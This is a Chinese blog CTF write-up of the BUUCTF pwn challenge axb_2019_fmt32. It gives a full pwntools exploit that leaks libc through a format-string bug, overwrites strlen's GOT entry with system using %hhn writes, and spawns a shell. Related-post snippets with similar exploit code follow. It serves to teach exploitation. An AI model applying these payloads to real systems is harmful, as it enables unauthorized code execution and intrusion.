BUUCTF【axb_2019_fmt32】

最新推荐文章于 2022-06-15 18:02:08 发布
最新推荐文章于 2022-06-15 18:02:08 发布
阅读量2.1k 收藏 1
点赞数 1
分类专栏: buuctf刷题 文章标签: 安全 pwn linux ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/124402722
版权

例行检查

在这里插入图片描述
是开 了部分relro,可以改写got表,然后栈不可执行不,

IDA分析

在这里插入图片描述
很简单的一个程序,会先初始化一些后续要用到的栈空间,然后让我们输入,字节数大小会有限制,然后再对我们的输入做一个长度判断,长度符合的话就会调用printf()函数,存在格式化字符串漏洞,程序里没有system,binsh字符串,我们这里就要先leak出地址,然后返回system即可,观察程序不难发现,我们无法溢出去控制返回地址,然而我们可以去改 某一函数的got表地址为system,从而去get shell,通过分析,strlen()函数是比较理想的,我们可以控制传参为/bin/sh从而去get shell.

exp:

我们发送如下payload,

payload = 'AAAAA'
payload += p32(str_len_got)
payload += p32(str_len_got+1)
payload += p32(str_len_got+2)
payload += '%150c'
payload += '%9$hhn'
payload += '%'
payload += str(hou + 80)
payload += 'c'
payload += '%10$hhn'
payload += '%'
payload += str(qian -hou)
payload += 'c'
payload += '%11$hhn'

这里我先输入了5个A,为了栈对齐,qian hou 是system地址的高低字节,
然后strlen()函数的got表地址就会被改成system地址:
在这里插入图片描述
这是在栈上布局的payload,这里0xf7字节不用修改,所以我只改了三个字节
执行完printf()后:
在这里插入图片描述
strlen()的got表地址就会只向system地址,我们再次发送’;sh’就可以get shell.
完整exp:

from pwn import *
#from LibcSearcher import *
elf = ELF('./axb_2019_fmt32')
#io = remote('node4.buuoj.cn',25468)
io = process('./axb_2019_fmt32')
libc = elf.libc
context(log_level='debug')

str_len_got = 0x804A024


io.recvuntil(':')

payload = '%5$p'

io.sendline(payload)

io.recvuntil(':')
#_rtld_global
leak = int(io.recv(10),16)
libc_base = leak-0x1d95c5

success('libc_base:'+hex(leak-0x1d95c5))
system = libc_base + libc.sym['system']
success('system:'+hex(leak-0x1d95c5+libc.sym['system']))
qian = (system >> 16) & 0xff
success('qian:'+hex(qian))
hou = (system >> 8) & 0xff
success('hou:'+hex(hou))
#0xb0   0xf7
payload = 'AAAAA'
payload += p32(str_len_got)
payload += p32(str_len_got+1)
payload += p32(str_len_got+2)
payload += '%150c'
payload += '%9$hhn'
payload += '%'
payload += str(hou + 80)
payload += 'c'
payload += '%10$hhn'
payload += '%'
payload += str(qian -hou)
payload += 'c'
payload += '%11$hhn'


io.recvuntil(':')

gdb.attach(io)
io.sendline(payload)

io.recvuntil(':')

io.sendline(';sh')

io.interactive()

在这里插入图片描述
喜提flag!!!

Leee333
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1533
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1514
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
axb_2019_fmt32
、moddemod
07-19 831
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
[BUUCTF-pwn]——axb_2019_fmt32
Y_peak的博客
03-18 426
[BUUCTF-pwn]——axb_2019_fmt32 啊啊啊啊啊啊啊,为什么明明很简单的一道题写了好久 from pwn import * from LibcSearcher import LibcSearcher p = remote("node3.buuoj.cn",26515) elf = ELF("./axb_2019_fmt32") puts_got = elf.got["puts"] strlen_got = elf.got["strlen"] payload1 = "%9$s"
Asm.rar_SUM
09-21
从提供的文件名"A+B.ASM"、"AxB+C.ASM"和"AxB.ASM"来看,我们可以推测这些程序分别实现了两个数相加、两个数相乘以及可能的乘加运算。 在计算机科学中,汇编语言是一种低级编程语言,它与机器语言密切相关,但比...
poj.rar_MáS
09-21
pku 3613 Cow Relays 题意:给一个无向图,求从起点s到终点e尽力n条边的路径最小值。 ...m表示节点个数,(aXb)表示a行b列的矩阵一个 ,那么(1Xm)* path[ l ](mXm) 。 最终复杂度为O(t^3logn)
aaa2axb:aaa2axb
03-18
【aaa2axb: Python编程框架解析】 在Python编程领域,"aaa2axb"似乎是一个自定义的项目或框架的名称。虽然提供的信息有限,我们可以根据Python的常见实践来推测可能涉及的知识点。 首先,"aaa2axb"可能是项目名,...
漫画阅读工具axb.zip
07-16
axb漫画阅读工具:一款开源的漫画浏览神器》 在数字阅读日益普及的时代,漫画爱好者们对于便捷、高效的阅读工具需求越来越高。"axb漫画阅读工具"正是这样一款专为漫画迷量身打造的应用,它不仅能够处理各种常见的...
jaxb_impl,api,xjc,jsr
01-14
**正文** JAXB(Java Architecture for XML Binding)是Java平台上的一个标准,它提供了一种在Java对象和XML文档之间进行映射的机制。这个技术是JSR(Java Specification Request)的一部分,具体来说,JSR 222定义...
axb_2019_fmt32(fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’))
weixin_61283545的博客
06-15 170
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) 第一个参数表示格式化字符串的偏移 第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}; 第三个参数表示已经输出的字符个数 第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn
axb_2019_fmt32 wp
xia0ji233
06-08 446
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
buuctf axb_2019_heap
weixin_45677731的博客
09-23 1588
拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出 同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink 除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了 但是,程序的保护全都开启了 也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址 如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞 打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
buuctf gyctf_2020_borrowstack(栈迁移)和r2t4,axb_2019_fmt32(格式化字符串和fmtstr_payload工具的使用)
carol2358的博客
05-24 1324
头痛,之前栈学的漏洞好多,只学了相关知识没有做题,真正碰到题目就不会了,真的头痛 gyctf_2020_borrowstack 栈迁移 payload设置 此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的? 1、使用ROPgadget查找leave;ret指令所在的地址 2、覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。 程序运行(32位,64位同理): 1、当函数正常返回时,执行leave;re
BUU刷题(三)
playmaker的博客
03-13 945
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
axb_2019_heap
doudoudedi
02-05 919
思路 格式化字符串泄露程序基址和libc基址然后unlink一个指针到bss段将free_hook写入system释放即可拿到shell exp: from pwn import * #p=process('./axb_2019_heap') p=remote('node3.buuoj.cn',29873) elf=ELF('./axb_2019_heap') libc=elf.libc #gdb...
E:\Qt6book_Axb_6.0\sampl3_1\widget.cpp:6: error: allocation of incomplete type 'Ui::Widget'
最新发布
06-04
这个错误提示是因为在Widget.cpp文件中,你尝试对一个不完整的类型Ui::Widget进行分配内存的操作。这通常是因为你在Widget.cpp中使用了Ui::Widget类的成员变量或成员函数,但是没有包含相应的头文件。 解决这个问题的方法是在Widget.cpp文件中包含相应的头文件,如: ```cpp #include "widget.h" #include "ui_widget.h" ``` 其中,"widget.h"是你的Widget类的头文件,"ui_widget.h"是由Qt Designer生成的包含Ui::Widget类定义的头文件。这样就可以在Widget.cpp中使用Ui::Widget类的成员变量和成员函数了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值